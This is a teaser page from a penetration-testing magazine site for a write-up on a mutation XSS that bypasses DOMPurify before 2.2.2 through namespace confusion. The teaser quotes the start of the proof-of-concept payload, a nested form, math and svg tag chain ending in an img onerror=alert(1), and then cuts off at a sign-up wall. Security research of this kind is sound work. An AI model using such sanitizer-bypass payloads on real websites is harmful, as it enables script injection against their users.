No products in the cart.
LOGIN / SIGN UP

Home
Blog
From SVG and back, yet another mutation XSS via namespace confusion for DOMPurify < 2.2.2 bypass

From SVG and back, yet another mutation XSS via namespace confusion for DOMPurify < 2.2.2 bypass

(357 views)

From SVG and back, yet another mutation XSS via namespace confusion for DOMPurify < 2.2.2 bypass by Daniel Santos For those who are only interested in the final payload here you go (I won’t judge). For the ones interested in why it works, please bear with me. <form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1)....

Read the rest of this story with a free account.

Sign up with Google Sign up with Facebook Sign up with email

Already have an account? Sign in

November 18, 2020

Author

Bartek Adach

Latest Articles

BlogDecember 28, 2022Cybersecurity in Education: What Parents, Teachers, and Students Should Know in 2023
BlogDecember 15, 2022Remembering Leonard Jacobs
BlogSeptember 30, 2022VPN Security: A Pentester's Guide to VPN Vulnerabilities
BlogAugust 9, 2022AppSec Tales II | Sign-in

Subscribe

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments

Inline Feedbacks

View all comments

https://pentestmag.com/wp-content/uploads/2023/06/PenTeswhitet.svg

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023